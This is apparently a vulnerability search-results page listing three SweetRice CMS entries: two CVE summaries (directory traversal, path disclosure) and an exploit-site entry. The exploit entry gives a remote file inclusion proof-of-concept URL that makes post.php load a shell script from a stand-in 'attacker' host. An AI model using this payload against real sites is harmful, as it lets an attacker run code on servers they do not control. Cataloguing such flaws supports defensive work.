3 matches found
CVE-2009-4231
Directory traversal vulnerability in as/lib/plugins.php in SweetRice 0.5.3 and earlier allows remote attackers to include and execute arbitrary local files via .. dot dot in the plugin parameter...
CVE-2011-3804
SweetRice 0.7.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by plugin/tinymce/plugins/advimage/images.php...
SweetRice <= 0.5.3 Remote File Include Vulnerability
Exploit for unknown platform in category web applications ==================================================== SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 0day.today 2018-03-28...